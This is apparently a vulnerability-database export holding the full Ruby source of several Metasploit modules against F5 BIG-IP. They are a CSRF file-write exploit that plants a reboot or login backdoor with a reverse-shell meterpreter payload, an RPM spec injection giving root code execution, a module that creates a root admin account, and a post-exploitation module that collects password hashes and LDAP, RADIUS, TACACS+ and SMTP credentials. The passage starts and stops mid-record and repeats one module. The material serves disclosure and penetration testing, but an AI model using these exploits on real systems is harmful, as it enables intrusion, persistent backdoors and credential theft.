\nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 BIG-IP iControl CSRF File Write SOAP API', \n'Description' => %q{ \nThis module exploits a cross-site request forgery (CSRF) vulnerability \nin F5 Big-IP's iControl interface to write an arbitrary file to the \nfilesystem. \n \nWhile any file can be written to any location as root, the \nexploitability is limited by SELinux; the vast majority of writable \nlocations are unavailable. By default, we write to a script that \nexecutes at reboot, which means the payload will execute the next time \nthe server boots. \n \nAn alternate target - Login - will add a backdoor that executes next \ntime a user logs in interactively. This overwrites a file, \nbut we restore it when we get a session \n \nNote that because this is a CSRF vulnerability, it starts a web \nserver, but an authenticated administrator must visit the site, which \nredirects them to the target. \n}, \n'Author' => [ \n'Ron Bowes' # Discovery, PoC, and module \n], \n'References' => [ \n['CVE', '2022-41622'], \n['URL', 'https://github.com/rbowes-r7/refreshing-soap-exploit'], \n['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'], \n['URL', 'https://support.f5.com/csp/article/K97843387'], \n['URL', 'https://support.f5.com/csp/article/K94221585'], \n['URL', 'https://support.f5.com/csp/article/K05403841'], \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => '2022-11-16', # Vendor advisory \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD], \n'Type' => :unix_cmd, \n'Privileged' => true, \n'Targets' => [ \n[ 'Restart', {}, ], \n[ 'Login', {}, ], \n[ 'Custom', {}, ] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, \nARTIFACTS_ON_DISK \n] 
\n} \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGET_HOST', [true, 'The IP or domain name of the target F5 device']), \nOptString.new('TARGET_URI', [true, 'The URI of the SOAP API', '/iControl/iControlPortal.cgi']), \nOptBool.new('TARGET_SSL', [true, 'Use SSL for the upstream connection?', true]), \nOptString.new('FILENAME', [false, 'The file on the target to overwrite (for \"custom\" target) - note that SELinux prevents overwriting a great deal of useful files']), \n] \n) \nend \n \ndef on_request_uri(socket, _request) \nif datastore['TARGET'] == 0 # restart \nfilename = '/shared/f5_update_action' \nfile_payload = <<~EOT \nUpdateAction \nhttps://localhost/success`#{payload.encoded}` \nhttps://localhost/error \n0 \n0 \n0 \n0 \nEOT \n \n# Delete the logfile if we get a session \nregister_file_for_cleanup('/var/log/f5_update_checker.out') \n \nprint_status(\"Redirecting the admin to overwrite #(unknown); if successful, your session will come approximately 2 minutes after the target is rebooted\") \nelsif datastore['TARGET'] == 1 # login \nfilename = '/var/run/config/timeout.sh' \nfile_payload = \"#{payload.encoded} & disown;\" \n \n# Delete the backdoored file if we get a session.. 
this will be fixed at \n# next reboot \nregister_file_for_cleanup('/var/run/config/timeout.sh') \n \nprint_status(\"Redirecting the admin to overwrite #(unknown); if successful, your session will come the next time a user logs in interactively\") \nelse # Custom \n \nfilename = datastore['FILENAME'] \nfile_payload = payload.encoded \n \nprint_status(\"Redirecting the admin to overwrite #(unknown) with the payload\") \nend \n \n# Build the SOAP request that'll be sent to the target server \ncsrf_payload = %( \n<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:con=\"urn:iControl:System/ConfigSync\"> \n<soapenv:Header/> \n<soapenv:Body> \n<con:upload_file soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"> \n<file_name xsi:type=\"xsd:string\">#(unknown)</file_name> \n<file_context xsi:type=\"urn:System.ConfigSync.FileTransferContext\" xmlns:urn=\"urn:iControl\"> \n<!--type: Common.OctetSequence--> \n<file_data xsi:type=\"urn:Common.OctetSequence\">#{Rex::Text.encode_base64(file_payload)}</file_data> \n<chain_type xsi:type=\"urn:Common.FileChainType\">FILE_FIRST_AND_LAST</chain_type> \n</file_context> \n</con:upload_file> \n</soapenv:Body> \n</soapenv:Envelope> \n) \n \n# Build the target URL \ntarget_url = \"#{datastore['TARGET_SSL'] ? 
'https' : 'http'}://#{datastore['TARGET_HOST']}#{datastore['TARGET_URI']}\" \n \n# Build the HTML payload that'll send the SOAP request via the user's browser \nhtml_payload = %( \n<html> \n<body> \n<form action=\"#{target_url}\" method=\"POST\" enctype=\"text/plain\"> \n<textarea id=\"payload\" name=\"<!--\">-->#{Rex::Text.html_encode(csrf_payload)}</textarea> \n</form> \n<script> \ndocument.forms[0].submit(); \n</script> \n</body> \n</html> \n) \n \n# Send the HTML to the browser \nsend_response(socket, html_payload, { 'Content-Type' => 'text/html' }) \nend \n \ndef exploit \n# Sanity check \nif datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?) \nfail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME') \nend \n \nprint_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below') \nsuper \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/169967/f5_icontrol_soap_csrf_rce_cve_2022_41622.rb.txt"}], "metasploit": [{"lastseen": "2023-02-03T20:50:40", "description": "This creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways. 
Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb\n", "cvss3": {}, "published": "2022-11-16T20:12:16", "type": "metasploit", "title": "F5 Big-IP Create Admin User", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2023-02-01T19:02:04", "id": "MSF:EXPLOIT-LINUX-LOCAL-F5_CREATE_USER-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/f5_create_user/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'unix_crypt'\n\nclass MetasploitModule < Msf::Exploit::Local\n include Msf::Post::Linux::F5Mcp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 Big-IP Create Admin User',\n 'Description' => %q{\n This creates a local user with a username/password and root-level\n privileges. Note that a root-level account is not required to do this,\n which makes it a privilege escalation issue.\n\n Note that this is pretty noisy, since it creates a user account and\n creates log files and such. 
Additionally, most (if not all)\n vulnerabilities in F5 grant root access anyways.\n\n Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Ron Bowes'],\n 'Platform' => [ 'unix', 'linux', 'python' ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'References' => [\n ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ],\n 'Privileged' => true,\n 'DisclosureDate' => '2022-11-16',\n 'Arch' => [ ARCH_CMD, ARCH_PYTHON ],\n 'Type' => :unix_cmd,\n 'Targets' => [[ 'Auto', {} ]],\n 'Notes' => {\n 'Stability' => [],\n 'Reliability' => [],\n 'SideEffects' => []\n }\n )\n )\n\n register_options([\n OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]),\n OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]),\n\n OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),\n ])\n end\n\n def exploit\n # Get or generate the username/password\n fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty?\n username = datastore['USERNAME']\n\n if datastore['CREATE_SESSION']\n password = Rex::Text.rand_text_alphanumeric(12)\n new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session\")\n else\n password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}\")\n end\n\n # If the password is already hashed, leave it as-is\n 
vprint_status('Hashing the password with SHA512')\n hashed_password = UnixCrypt::SHA512.build(password)\n\n if !hashed_password || hashed_password.empty?\n fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt')\n end\n\n # These requests have to go in a single 'session', which, to us, is\n # a single packet (since we don't have AF_UNIX sockets)\n result = mcp_send_recv([\n # Authenticate as 'admin' (this probably shouldn't work but does)\n mcp_build('user_authenticated', 'structure', [\n mcp_build('user_authenticated_name', 'string', 'admin')\n ]),\n\n # Start transaction\n mcp_build('start_transaction', 'structure', [\n mcp_build('start_transaction_load_type', 'ulong', 0)\n ]),\n\n # Create the role mapping\n mcp_build('create', 'structure', [\n mcp_build('user_role_partition', 'structure', [\n mcp_build('user_role_partition_user', 'string', username),\n mcp_build('user_role_partition_role', 'ulong', 0),\n mcp_build('user_role_partition_partition', 'string', '[All]'),\n ])\n ]),\n\n # Create the userdb entry\n mcp_build('create', 'structure', [\n mcp_build('userdb_entry', 'structure', [\n mcp_build('userdb_entry_name', 'string', username),\n mcp_build('userdb_entry_partition_id', 'string', 'Common'),\n mcp_build('userdb_entry_is_system', 'ulong', 0),\n mcp_build('userdb_entry_shell', 'string', '/bin/bash'),\n mcp_build('userdb_entry_is_crypted', 'ulong', 1),\n mcp_build('userdb_entry_passwd', 'string', hashed_password),\n ])\n ]),\n\n # Finish the transaction\n mcp_build('end_transaction', 'structure', [])\n ])\n\n # Handle errors\n if result.nil?\n fail_with(Failure::Unknown, 'Request to mcp appeared to fail')\n end\n\n # The only result we really care about is an error\n error_returned = false\n result.each do |r|\n result = mcp_get_single(r, 'result')\n result_code = mcp_get_single(result, 'result_code')\n\n # If there's no code or it's zero, just ignore it\n if result_code.nil? 
|| result_code == 0\n next\n end\n\n # If we're here, an error was returned!\n error_returned = true\n\n # Otherwise, try and get result_message\n result_message = mcp_get_single(result, 'result_message')\n if result_message.nil?\n print_warning(\"mcp query returned a non-zero result (#{result_code}), but no error message\")\n else\n print_error(\"mcp query returned an error message: #{result_message} (code: #{result_code})\")\n end\n end\n\n # Let them know if it likely worked\n if !error_returned\n print_good(\"Service didn't return an error, so user was likely created!\")\n\n if datastore['CREATE_SESSION']\n print_status('Attempting create a root session...')\n\n out = cmd_exec(\"echo -ne \\\"#{password}\\\\n#{password}\\\\n#{new_password}\\\\n#{new_password}\\\\n#{payload.encoded}\\\\n\\\" | su #{username}\")\n\n vprint_status(\"Output from su command: #{out}\")\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/f5_create_user.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-13T22:48:58", "description": "This module gathers various interesting pieces of data from F5's \"mcp\" datastore, which is accessed via /var/run/mcp using a proprietary protocol. 
Adapted from: https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb\n", "cvss3": {}, "published": "2022-11-23T19:10:34", "type": "metasploit", "title": "F5 Big-IP Gather Information from MCP Datastore", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-30T16:59:10", "id": "MSF:POST-LINUX-GATHER-F5_LOOT_MCP-", "href": "https://www.rapid7.com/db/modules/post/linux/gather/f5_loot_mcp/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::System\n include Msf::Post::Linux::F5Mcp\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 Big-IP Gather Information from MCP Datastore',\n 'Description' => %q{\n This module gathers various interesting pieces of data from F5's\n \"mcp\" datastore, which is accessed via /var/run/mcp using a\n proprietary protocol.\n\n Adapted from: https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Ron Bowes'],\n 'Platform' => ['linux', 'unix'],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'References' => [\n ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ],\n 'DisclosureDate' => '2022-11-16',\n 'Notes' => {\n 'Stability' => [],\n 'Reliability' => [],\n 'SideEffects' => []\n }\n )\n )\n\n register_options(\n [\n OptBool.new('GATHER_HASHES', [true, 'Gather password hashes from MCP', true]),\n OptBool.new('GATHER_SERVICE_PASSWORDS', [true, 'Gather upstream passwords (ie, LDAP, AD, RADIUS, etc) from MCP', true]),\n 
OptBool.new('GATHER_DB_VARIABLES', [true, 'Gather database variables (warning: slow)', false]),\n ]\n )\n end\n\n def gather_hashes\n print_status('Gathering users and password hashes from MCP')\n users = mcp_simple_query('userdb_entry')\n\n unless users\n print_error('Failed to query users')\n return\n end\n\n users.each do |u|\n print_good(\"#{u['userdb_entry_name']}:#{u['userdb_entry_passwd']}\")\n\n create_credential(\n jtr_format: Metasploit::Framework::Hashes.identify_hash(u['userdb_entry_passwd']),\n origin_type: :session,\n post_reference_name: refname,\n private_type: :nonreplayable_hash,\n private_data: u['userdb_entry_passwd'],\n session_id: session_db_id,\n username: u['userdb_entry_name'],\n workspace_id: myworkspace_id\n )\n end\n end\n\n def gather_upstream_passwords\n print_status('Gathering upstream passwords from MCP')\n\n vprint_status('Trying to fetch LDAP / Active Directory configuration')\n ldap_config = mcp_simple_query('auth_ldap_config') || []\n ldap_config.select! { |config| config['auth_ldap_config_bind_pw'] }\n if ldap_config.empty?\n print_status('No LDAP / Active Directory password found')\n else\n ldap_config.each do |config|\n config['auth_ldap_config_servers'].each do |server|\n report_cred(\n username: config['auth_ldap_config_bind_dn'],\n password: config['auth_ldap_config_bind_pw'],\n host: server,\n port: config['auth_ldap_config_port'],\n service_name: (config['auth_ldap_config_ssl'] == 1 ? 'ldaps' : 'ldap')\n )\n end\n end\n end\n\n vprint_status('Trying to fetch Radius configuration')\n radius_config = mcp_simple_query('radius_server') || []\n radius_config.select! 
{ |config| config['radius_server_secret'] }\n if radius_config.empty?\n print_status('No Radius password found')\n else\n radius_config.each do |config|\n report_cred(\n password: config['radius_server_secret'],\n host: config['radius_server_server'],\n port: config['radius_server_port'],\n service_name: 'radius'\n )\n end\n end\n\n vprint_status('Trying to fetch TACACS+ configuration')\n tacacs_config = mcp_simple_query('auth_tacacs_config') || []\n tacacs_config.select! { |config| config['auth_tacacs_config_secret'] }\n if tacacs_config.empty?\n print_status('No TACACS+ password found')\n else\n tacacs_config.each do |config|\n config['auth_tacacs_config_servers'].each do |server|\n report_cred(\n password: config['auth_tacacs_config_secret'],\n host: server,\n port: 49,\n service_name: 'tacacs+'\n )\n end\n end\n end\n\n vprint_status('Trying to fetch SMTP configuration')\n smtp_config = mcp_simple_query('smtp_config') || []\n smtp_config.select! { |config| config['smtp_config_username'] }\n if smtp_config.empty?\n print_status('No SMTP password found')\n else\n smtp_config.each do |config|\n report_cred(\n username: config['smtp_config_username'],\n password: config['smtp_config_password'],\n host: config['smtp_config_smtp_server_address'],\n port: config['smtp_config_smtp_server_port'],\n service_name: 'smtp'\n )\n end\n end\n end\n\n def gather_db_variables\n print_status('Fetching db variables from MCP (this takes a bit)...')\n vars = mcp_simple_query('db_variable')\n\n unless vars\n print_error('Failed to query db variables')\n return\n end\n\n vars.each do |v|\n print_good \"#{v['db_variable_name']} => #{v['db_variable_value']}\"\n end\n end\n\n def resolve_host(hostname)\n ip = nil\n if session.type == 'meterpreter' && session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_NET_RESOLVE_HOST)\n result = session.net.resolve.resolve_host(hostname)\n ip = result[:ip] if result\n else\n result = cmd_exec(\"dig +short 
'#{hostname}'\")\n ip = result.strip unless result.blank?\n end\n\n vprint_warning(\"Failed to resolve hostname: #{hostname}\") unless ip\n\n ip\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"Failed to resolve hostname: #{hostname.inspect}\", error: e)\n end\n\n def report_cred(opts)\n netloc = \"#{opts[:host]}:#{opts[:port]}\"\n print_good(\"#{netloc.ljust(21)} - #{opts[:service_name]}: '#{opts[:username]}:#{opts[:password]}'\")\n\n if opts[:host] && !Rex::Socket.is_ip_addr?(opts[:host])\n opts[:host] = resolve_host(opts[:host])\n end\n\n service_data = {\n address: opts[:host],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: opts.fetch(:protocol, 'tcp'),\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n post_reference_name: refname,\n session_id: session_db_id,\n origin_type: :session,\n private_data: opts[:password],\n private_type: :password,\n username: opts[:username]\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def run\n gather_hashes if datastore['GATHER_HASHES']\n gather_upstream_passwords if datastore['GATHER_SERVICE_PASSWORDS']\n gather_db_variables if datastore['GATHER_DB_VARIABLES']\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/f5_loot_mcp.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-18T06:53:02", "description": "This module exploits a newline injection into an RPM .rpmspec file that permits authenticated users to remotely execute commands. 
Successful exploitation results in remote code execution as the root user.\n", "cvss3": {}, "published": "2022-11-16T20:04:18", "type": "metasploit", "title": "F5 BIG-IP iControl Authenticated RCE via RPM Creator", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-23T18:42:07", "id": "MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_RPMSPEC_RCE_CVE_2022_41800-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator',\n 'Description' => %q{\n This module exploits a newline injection into an RPM .rpmspec file\n that permits authenticated users to remotely execute commands.\n\n Successful exploitation results in remote code execution\n as the root user.\n },\n 'Author' => [\n 'Ron Bowes' # Discovery, PoC, and module\n ],\n 'References' => [\n ['CVE', '2022-41800'],\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ['URL', 'https://support.f5.com/csp/article/K13325942'],\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-11-16', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [ 'Default', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.\n 
'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION], # One at a time\n 'SideEffects' => [\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('HttpUsername', [true, 'iControl username', 'admin']),\n OptString.new('HttpPassword', [true, 'iControl password', ''])\n ]\n )\n end\n\n def exploit\n # The RPM name is based on these, so we need these to delete the RPM file after\n name = rand_text_alphanumeric(5..10)\n version = \"#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}\"\n release = \"#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}\"\n\n vprint_status('Creating an .rpmspec file on the target...')\n result = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'),\n 'ctype' => 'application/json',\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'data' => {\n 'specFileData' => {\n 'name' => name,\n 'srcBasePath' => '/tmp',\n 'version' => version,\n 'release' => release,\n # This is the injection - add newlines then a '%check' section\n 'description' => \"\\n\\n%check\\n#{payload.encoded}\\n\",\n 'summary' => rand_text_alphanumeric(5..10)\n }\n }.to_json\n })\n\n fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result\n fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401\n fail_with(Failure::UnexpectedReply, \"Server returned an unexpected response: HTTP/#{result.code}\") if result.code != 200\n\n json = result&.get_json_document\n fail_with(Failure::UnexpectedReply, \"Server didn't return valid JSON\") unless json\n\n file_path = json['specFilePath']\n fail_with(Failure::UnexpectedReply, \"Server didn't return a specFilePath\") unless file_path\n vprint_status(\"Created spec file: 
#{file_path}\")\n register_file_for_cleanup(file_path)\n\n # We can also use `exit 1` in the %check function to prevent this file\n # from being created, rather than cleaning it up.. but that seems noisier?\n # Neither option gets logged so /shrug\n register_file_for_cleanup(\"/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm\")\n\n vprint_status('Building the RPM to trigger the payload...')\n result = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'),\n 'ctype' => 'application/json',\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'data' => {\n 'state' => {},\n 'appName' => rand_text_alphanumeric(5..10),\n 'packageDirectory' => '/tmp',\n 'specFilePath' => file_path\n }.to_json\n })\n fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result\n fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401\n fail_with(Failure::UnexpectedReply, \"Server returned an unexpected response: HTTP/#{result.code}\") if result.code < 200 || result.code > 299\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-19T22:45:30", "description": "This module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. 
This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.\n", "cvss3": {}, "published": "2022-11-16T19:58:15", "type": "metasploit", "title": "F5 BIG-IP iControl CSRF File Write SOAP API", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-18T22:18:25", "id": "MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_SOAP_CSRF_RCE_CVE_2022_41622-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 BIG-IP iControl CSRF File Write SOAP API',\n 'Description' => %q{\n This module exploits a cross-site request forgery (CSRF) vulnerability\n in F5 Big-IP's iControl interface to write an arbitrary file to the\n filesystem.\n\n While any file can be written to any location as root, the\n exploitability is limited by SELinux; the vast majority of writable\n locations are unavailable. By default, we write to a script that\n executes at reboot, which means the payload will execute the next time\n the server boots.\n\n An alternate target - Login - will add a backdoor that executes next\n time a user logs in interactively. 
This overwrites a file,\n but we restore it when we get a session\n\n Note that because this is a CSRF vulnerability, it starts a web\n server, but an authenticated administrator must visit the site, which\n redirects them to the target.\n },\n 'Author' => [\n 'Ron Bowes' # Discovery, PoC, and module\n ],\n 'References' => [\n ['CVE', '2022-41622'],\n ['URL', 'https://github.com/rbowes-r7/refreshing-soap-exploit'],\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ['URL', 'https://support.f5.com/csp/article/K94221585'],\n ['URL', 'https://support.f5.com/csp/article/K05403841'],\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-11-16', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Type' => :unix_cmd,\n 'Privileged' => true,\n 'Targets' => [\n [ 'Restart', {}, ],\n [ 'Login', {}, ],\n [ 'Custom', {}, ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGET_HOST', [true, 'The IP or domain name of the target F5 device']),\n OptString.new('TARGET_URI', [true, 'The URI of the SOAP API', '/iControl/iControlPortal.cgi']),\n OptBool.new('TARGET_SSL', [true, 'Use SSL for the upstream connection?', true]),\n OptString.new('FILENAME', [false, 'The file on the target to overwrite (for \"custom\" target) - note that SELinux prevents overwriting a great deal of useful files']),\n ]\n )\n end\n\n def on_request_uri(socket, _request)\n if datastore['TARGET'] == 0 # restart\n filename = '/shared/f5_update_action'\n file_payload = <<~EOT\n UpdateAction\n 
https://localhost/success`#{payload.encoded}`\n https://localhost/error\n 0\n 0\n 0\n 0\n EOT\n\n # Delete the logfile if we get a session\n register_file_for_cleanup('/var/log/f5_update_checker.out')\n\n print_status(\"Redirecting the admin to overwrite #(unknown); if successful, your session will come approximately 2 minutes after the target is rebooted\")\n elsif datastore['TARGET'] == 1 # login\n filename = '/var/run/config/timeout.sh'\n file_payload = \"#{payload.encoded} & disown;\"\n\n # Delete the backdoored file if we get a session.. this will be fixed at\n # next reboot\n register_file_for_cleanup('/var/run/config/timeout.sh')\n\n print_status(\"Redirecting the admin to overwrite #(unknown); if successful, your session will come the next time a user logs in interactively\")\n else # Custom\n\n filename = datastore['FILENAME']\n file_payload = payload.encoded\n\n print_status(\"Redirecting the admin to overwrite #(unknown) with the payload\")\n end\n\n # Build the SOAP request that'll be sent to the target server\n csrf_payload = %(\n <soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:con=\"urn:iControl:System/ConfigSync\">\n <soapenv:Header/>\n <soapenv:Body>\n <con:upload_file soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n <file_name xsi:type=\"xsd:string\">#(unknown)</file_name>\n <file_context xsi:type=\"urn:System.ConfigSync.FileTransferContext\" xmlns:urn=\"urn:iControl\">\n <!--type: Common.OctetSequence-->\n <file_data xsi:type=\"urn:Common.OctetSequence\">#{Rex::Text.encode_base64(file_payload)}</file_data>\n <chain_type xsi:type=\"urn:Common.FileChainType\">FILE_FIRST_AND_LAST</chain_type>\n </file_context>\n </con:upload_file>\n </soapenv:Body>\n</soapenv:Envelope>\n )\n\n # Build the target URL\n target_url = \"#{datastore['TARGET_SSL'] ? 
